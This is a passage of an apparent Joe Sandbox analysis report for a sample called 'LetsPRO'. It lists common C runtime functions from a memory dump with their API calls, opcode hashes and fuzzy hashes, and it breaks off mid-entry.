                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2959964966-0
                                        • Opcode ID: b84f3feb2e2bb7866f74cca3189d184c099b4d505cb4176aa6effa024f19c758
                                        • Instruction ID: cc25ea93fa4991b46bf156ff69d195cd9c624df7bd32e6859837c9be14288e13
                                        • Opcode Fuzzy Hash: b84f3feb2e2bb7866f74cca3189d184c099b4d505cb4176aa6effa024f19c758
                                        • Instruction Fuzzy Hash: 2E913735B082699BCF118F6988801ED7BB9AFAA309F14819DFC64A7704D770DE50CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90C096 Relevance: 6.2, APIs: 4, Instructions: 160COMMON
                                        Download Yara Rule
                                        APIs
                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000), ref: 6C90C0FF
                                        • GetCPInfo.KERNEL32(00000000,?), ref: 6C90C112
                                        • _memset.LIBCMT(0000001D,00000000,00000101), ref: 6C90C12A
                                        • _memset.LIBCMT(0000001D,00000000,00000101,00000000,?,00000000), ref: 6C92A93D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _memset$CodeInfoPageValid
                                        • String ID:
                                        • API String ID: 1608968462-0
                                        • Opcode ID: 63a01bd3f41c48ab66f9e49b1ebca9b6659ed4bcf1532832acc161b784987a4c
                                        • Instruction ID: 787a9e8fce62742476989d50fec688ad079b4270a0b8cc3f2ea51e5a6bb6c4b5
                                        • Opcode Fuzzy Hash: 63a01bd3f41c48ab66f9e49b1ebca9b6659ed4bcf1532832acc161b784987a4c
                                        • Instruction Fuzzy Hash: 4A514976A04259CFDF10CF69C8802BEBBB4AF41708F25846BD891DBA46D73DC545DBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C936D37 Relevance: 6.1, APIs: 4, Instructions: 123COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000), ref: 6C936E12
                                        • _memset.LIBCMT(00000000,00000000,?,00000000,00000000), ref: 6C936E25
                                        • ??2@YAPAXI@Z.MSVCR100(0000000C,00000000,00000000,?,00000000,00000000), ref: 6C936E2C
                                        • ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR100(?,?,?,?,?,00000000), ref: 6C936E77
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Spin$??2@Concurrency@@Once@?$_Wait@$00@details@_memset
                                        • String ID:
                                        • API String ID: 4058414921-0
                                        • Opcode ID: 69daed4d9beaedea8a5ce3bf8483e580b10bee0cd76c2a5add48e82975206ff7
                                        • Instruction ID: a2dabf286ca3206072320b93555e1fdc08d66beed9a23ef705cae15bccdc7501
                                        • Opcode Fuzzy Hash: 69daed4d9beaedea8a5ce3bf8483e580b10bee0cd76c2a5add48e82975206ff7
                                        • Instruction Fuzzy Hash: 25519C31104311CFD716CF29C981B16B7F4FF99328F148A6DE5AA8BA95D730E849CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C943C0E Relevance: 6.1, APIs: 4, Instructions: 123COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000), ref: 6C943CE9
                                        • _memset.LIBCMT(00000000,00000000,?,00000000,00000000), ref: 6C943CFC
                                        • ??2@YAPAXI@Z.MSVCR100(0000000C,00000000,00000000,?,00000000,00000000), ref: 6C943D03
                                        • ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR100(?,?,?,?,?,00000000), ref: 6C943D4E
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Spin$??2@Concurrency@@Once@?$_Wait@$00@details@_memset
                                        • String ID:
                                        • API String ID: 4058414921-0
                                        • Opcode ID: 07e1e8a5f72ae8c2d99dfdf407c87043eaf16671770e8468c99335f238f8ccf7
                                        • Instruction ID: 9dbf6ebf994e0b8192f90e1eb87c464ffad79b336918e416468fa90da958b616
                                        • Opcode Fuzzy Hash: 07e1e8a5f72ae8c2d99dfdf407c87043eaf16671770e8468c99335f238f8ccf7
                                        • Instruction Fuzzy Hash: 55516830208341CFD715CF39C584B16B7E4BF99329F14CA6DE5AA8BA95E730E845CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C93FA6B Relevance: 6.1, APIs: 4, Instructions: 123COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,?), ref: 6C93FB45
                                        • _memset.LIBCMT(00000000,00000000,?,00000000,?), ref: 6C93FB58
                                        • ??2@YAPAXI@Z.MSVCR100(0000000C,00000000,00000000,?,00000000,?), ref: 6C93FB5F
                                        • ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR100(?,?,?,?,?,?), ref: 6C93FBAA
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Spin$??2@Concurrency@@Once@?$_Wait@$00@details@_memset
                                        • String ID:
                                        • API String ID: 4058414921-0
                                        • Opcode ID: 2bc02e79309228a9f2fc27723ed5db87cb1678b6b6792ceca9b2e9e7295562d4
                                        • Instruction ID: 1c8719a3014ec5b84abc6eada12b6e3cb79d9a513979ab7e2a4e1b1961771954
                                        • Opcode Fuzzy Hash: 2bc02e79309228a9f2fc27723ed5db87cb1678b6b6792ceca9b2e9e7295562d4
                                        • Instruction Fuzzy Hash: 155178711083118FD715CF29C580B16B7F4FF99328F149AADE4AE8BA95E730E845CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C913BCC Relevance: 6.1, APIs: 4, Instructions: 123COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_noinfo_mbsdec
                                        • String ID:
                                        • API String ID: 1897159254-0
                                        • Opcode ID: ba363baece1d8c7b684dc0194931fb9f6142483f88c8384219b9233af3681357
                                        • Instruction ID: 438f707a2924e818cacd4709a3378d0519a623f756b8c8783db1517a4d87abd3
                                        • Opcode Fuzzy Hash: ba363baece1d8c7b684dc0194931fb9f6142483f88c8384219b9233af3681357
                                        • Instruction Fuzzy Hash: 4531272628C2D99FD7128F38C9512AA3BB9BB56314B2564A8E8D94FE01D231D886D750
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C94380D Relevance: 6.1, APIs: 4, Instructions: 121COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,00000000), ref: 6C9438D6
                                        • _memset.LIBCMT(00000000,00000000,?,00000000,00000000,00000000), ref: 6C9438E8
                                        • ??2@YAPAXI@Z.MSVCR100(0000000C,00000000,00000000,?,00000000,00000000,00000000), ref: 6C9438EF
                                        • ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR100(00000000,00000000), ref: 6C943936
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Spin$??2@Concurrency@@Once@?$_Wait@$00@details@_memset
                                        • String ID:
                                        • API String ID: 4058414921-0
                                        • Opcode ID: b62486c84676e4152b750b6c50ae8c7902c16ea1c48dc794696d889406f543d4
                                        • Instruction ID: 489ce7a5cff45bf918fbfbc7547e2afd15661d423dc2039913dc26b489e1ff72
                                        • Opcode Fuzzy Hash: b62486c84676e4152b750b6c50ae8c7902c16ea1c48dc794696d889406f543d4
                                        • Instruction Fuzzy Hash: 52416630900205CFDB19CF39C584BAAB7F4BF58328F24C6ADC5669BA91E730E941CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C940FD5 Relevance: 6.1, APIs: 4, Instructions: 111COMMON
                                        Download Yara Rule
                                        APIs
                                        • EnterCriticalSection.KERNEL32(?,759230B0,?,?,6C940F7E), ref: 6C940FF1
                                        • ??3@YAXPAX@Z.MSVCR100(?), ref: 6C9410D2
                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C9410DF
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CriticalSection$??3@EnterLeave
                                        • String ID:
                                        • API String ID: 3906572401-0
                                        • Opcode ID: 7df3e9a057b079e8f65389b7cd9c82cba615f1f578220e1f9bf887b61960c328
                                        • Instruction ID: a6664b2c62d546a864269542c1051e2980a67eb9b3dc3e348767be9e4c03ee9a
                                        • Opcode Fuzzy Hash: 7df3e9a057b079e8f65389b7cd9c82cba615f1f578220e1f9bf887b61960c328
                                        • Instruction Fuzzy Hash: 6241CF74604640CFC724CF29C080A9AB7F8FF5A315F1485AEE88ACBB11E731E955DBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9484AF Relevance: 6.1, APIs: 4, Instructions: 108threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 6C9484BF
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6C9484F4
                                        • _CxxThrowException.MSVCR100(6C933918,6C9A0D0C,?,?), ref: 6C948502
                                        • std::exception::exception.LIBCMT(?,?), ref: 6C9485D7
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Concurrency::unsupported_os::unsupported_osCurrentExceptionThreadThrowstd::exception::exception
                                        • String ID:
                                        • API String ID: 1840351702-0
                                        • Opcode ID: f4692de7e15d965feb1a69631453fe46fc9a97292e23ffc55044cc803bd2c5ed
                                        • Instruction ID: b3c270d62fa5c870e3010275850f5b1fa15a4f8aef5866948dbab75e891ef851
                                        • Opcode Fuzzy Hash: f4692de7e15d965feb1a69631453fe46fc9a97292e23ffc55044cc803bd2c5ed
                                        • Instruction Fuzzy Hash: 3D41D071504385DFDF19CF65C084A9DBBB8AF1031CF1484AED986ABA51CB70EA89CBD4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C901C05 Relevance: 6.1, APIs: 4, Instructions: 105COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _isleadbyte_l.MSVCR100(?,?,?,?,?,?), ref: 6C904479
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 6C90449F
                                        • _errno.MSVCR100(?,?,?,?), ref: 6C92A1CD
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide_errno_isleadbyte_l
                                        • String ID:
                                        • API String ID: 911568377-0
                                        • Opcode ID: f1be938d15060576b74b8d59e7d1da8dc8b425d2b94f5246e4b4a79e7cc292f0
                                        • Instruction ID: 87b0a47f52c37ae986d32dce22852b7ec9d15c3dd6a67926287049a7be2b284a
                                        • Opcode Fuzzy Hash: f1be938d15060576b74b8d59e7d1da8dc8b425d2b94f5246e4b4a79e7cc292f0
                                        • Instruction Fuzzy Hash: E0310532705255EFDB00DF64C884AAE3BB9FF02328F14456DE4A5DB692DB31DA80CB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90FF28 Relevance: 6.1, APIs: 4, Instructions: 99COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __isctype_l.LIBCMT(7FFFFFFF,00000001,00000000,?,7FFFFFFF,00000000,00000000,00000000,00000000,?,7FFFFFFF,00000000), ref: 6C92A334
                                        • _isleadbyte_l.MSVCR100(00000008,00000000,?,7FFFFFFF,00000000,00000000,00000000,00000000,?), ref: 6C92A370
                                        • __crtLCMapStringA.MSVCR100(00000000,?,00000100,00000000,00000001,7FFFFFFF,00000003,?,00000001,?,7FFFFFFF,00000000,00000000,00000000,00000000,?), ref: 6C92A3BD
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: String__crt__isctype_l_isleadbyte_l
                                        • String ID:
                                        • API String ID: 150061899-0
                                        • Opcode ID: 0988bc518175f7f60f598ee9daddff1fd1dbe5f73af34c926759ebd1c574d147
                                        • Instruction ID: d3004993d66fde2ad1650548c3860291cc1881bd79c7059af334962587a16d54
                                        • Opcode Fuzzy Hash: 0988bc518175f7f60f598ee9daddff1fd1dbe5f73af34c926759ebd1c574d147
                                        • Instruction Fuzzy Hash: 32313731A08249EFDF01CB98C845FEE7FB8EF12318F1441A9E5949BA91DB35D685CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C936578 Relevance: 6.1, APIs: 4, Instructions: 91sleepCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ?_SpinOnce@?$_SpinWait@$0A@@details@Concurrency@@QAE_NXZ.MSVCR100(6C9366E0,0000002C,6C936A53,00000000,-00000004,-00000004,00000000,00000000,?,6C93F820,?,00000000,?,?,6C939B4B,?), ref: 6C93659C
                                          • Part of subcall function 6C936EC2: _SpinWait.LIBCMT(00000FA0,00000FA0,?,6C93ABFA,00000000), ref: 6C936EDC
                                        • ?_AcquireWrite@_ReaderWriterLock@details@Concurrency@@QAEXXZ.MSVCR100(6C9366E0,0000002C,6C936A53,00000000,-00000004,-00000004,00000000,00000000,?,6C93F820,?,00000000,?,?,6C939B4B,?), ref: 6C9365E2
                                        • ?_TryAcquireWrite@_ReaderWriterLock@details@Concurrency@@QAE_NXZ.MSVCR100(6C9366E0,0000002C,6C936A53,00000000,-00000004,-00000004,00000000,00000000,?,6C93F820,?,00000000,?,?,6C939B4B,?), ref: 6C936632
                                        • Sleep.KERNEL32(00000001,6C9366E0,0000002C,6C936A53,00000000,-00000004,-00000004,00000000,00000000,?,6C93F820,?,00000000,?,?,6C939B4B), ref: 6C936652
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Concurrency@@Spin$AcquireLock@details@ReaderWrite@_Writer$A@@details@Once@?$_SleepWaitWait@$0
                                        • String ID:
                                        • API String ID: 947146699-0
                                        • Opcode ID: 6051d207057bbff6907139953b71f664d48f5ed7fc9647ced1ef9d5c8e4d787a
                                        • Instruction ID: 8ed5b443bbda18b4faaa1b10f32008938f20dc5dd0107ff2e1db0fa1f76b6603
                                        • Opcode Fuzzy Hash: 6051d207057bbff6907139953b71f664d48f5ed7fc9647ced1ef9d5c8e4d787a
                                        • Instruction Fuzzy Hash: DC414371A00B68CFEB10CFA8C5447CEBBB1BF24358F142528C459A7A80CB75E908CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C904CA4 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2959964966-0
                                        • Opcode ID: 326b6cd964aaa0cdbd0c02533cf45ed4de55326c12ac84c500560b9e1f884dfe
                                        • Instruction ID: 83a2b8977f214e170d65937f3553c21beb4fd28d432c091627adac236badce39
                                        • Opcode Fuzzy Hash: 326b6cd964aaa0cdbd0c02533cf45ed4de55326c12ac84c500560b9e1f884dfe
                                        • Instruction Fuzzy Hash: 7421E276B06225DBDB149F29C8006BA33B9FF71B4CB29419DECA08BB54E735D940DB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C910D9F Relevance: 6.1, APIs: 4, Instructions: 85COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _towlower_l.MSVCR100(?,?,?), ref: 6C910DE7
                                          • Part of subcall function 6C90257C: iswctype.MSVCR100(?,00000001,?,?,?,?,?,?,?), ref: 6C9025C0
                                        • _towlower_l.MSVCR100(?,?,?,?,?), ref: 6C910DF7
                                        • _errno.MSVCR100 ref: 6C92C713
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C92C71E
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _towlower_l$_errno_invalid_parameter_noinfoiswctype
                                        • String ID:
                                        • API String ID: 2204055994-0
                                        • Opcode ID: 64124899a46ccb5a046c23fd0fa33207cc7602b26788b075233cb4fb38afb576
                                        • Instruction ID: 0056c63abdd5f960b89a46a3bcf5e24dc8c3bd33eeba46b4638c5d59f0790201
                                        • Opcode Fuzzy Hash: 64124899a46ccb5a046c23fd0fa33207cc7602b26788b075233cb4fb38afb576
                                        • Instruction Fuzzy Hash: C8214B7650519AD7EB209E6AC8817BA37BCBB10F59F600516E8F0CBA84E739CD54C770
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C93A6A0 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 6C93A869: _fabs.LIBCMT(00000000,00000000,00000000,00000000,?,6C93A797,00000000,00000000,?,6C93A58B), ref: 6C93A8A1
                                        • sqrt.MSVCR100(?,?,?,?,?), ref: 6C93A71F
                                        • _fabs.LIBCMT(?,?,?,?,?), ref: 6C93A72D
                                          • Part of subcall function 6C98132F: __ctrlfp.LIBCMT ref: 6C981348
                                          • Part of subcall function 6C98132F: __except1.LIBCMT ref: 6C981394
                                        • _fabs.LIBCMT(?,?,?,?,?), ref: 6C93A74E
                                        • exp.MSVCR100(?,?,?,?,?), ref: 6C93A75C
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _fabs$__ctrlfp__except1sqrt
                                        • String ID:
                                        • API String ID: 2723176039-0
                                        • Opcode ID: c4640897e338dc08dc9c3ab7b8461035ce6526b115f48cb004446e78f55bf37a
                                        • Instruction ID: 4f5fd948bbd104171ee21be6446c4221f0507d909152c9a791a928dde37df279
                                        • Opcode Fuzzy Hash: c4640897e338dc08dc9c3ab7b8461035ce6526b115f48cb004446e78f55bf37a
                                        • Instruction Fuzzy Hash: B521B371E00518EACF046FF4E8884EEFBB4EF54354F208495E89862790DF31D966C794
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C916054 Relevance: 6.1, APIs: 4, Instructions: 76COMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcspbrk.LIBCMT(?,6C91609C,?,00000000,6C91668A,?,?,?,?,?,?,6C915A4E), ref: 6C91607B
                                        • _calloc_crt.MSVCR100(00000004,00000001,?,00000000,6C91668A,?,?,?,?,?,?,6C915A4E), ref: 6C9160C0
                                        • free.MSVCR100(00000000,?,00000000,6C91668A,?,?,?,?,?,?,6C915A4E), ref: 6C9160FC
                                        • _wmatch.LIBCMT ref: 6C927778
                                          • Part of subcall function 6C91601B: _malloc_crt.MSVCR100(00000008,?,6C94CD5F,?,00000000,-00000002,6C9A5BD0), ref: 6C916022
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _calloc_crt_malloc_crt_wcspbrk_wmatchfree
                                        • String ID:
                                        • API String ID: 588445202-0
                                        • Opcode ID: c68b4bf89a8355f27022947d4df0ace62893aa12efa2db16c0411926461855ea
                                        • Instruction ID: de6d0315a0cdcdffcf7e8747d78e305312a68ccc157585e80fc24dc484d2f18e
                                        • Opcode Fuzzy Hash: c68b4bf89a8355f27022947d4df0ace62893aa12efa2db16c0411926461855ea
                                        • Instruction Fuzzy Hash: 43219DB2F0D924CFDB128F6E984150AB7F9EF96B28335852AD495D7E50EB32D841CB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C937D98 Relevance: 6.1, APIs: 4, Instructions: 76timeCOMMON
                                        Download Yara Rule
                                        APIs
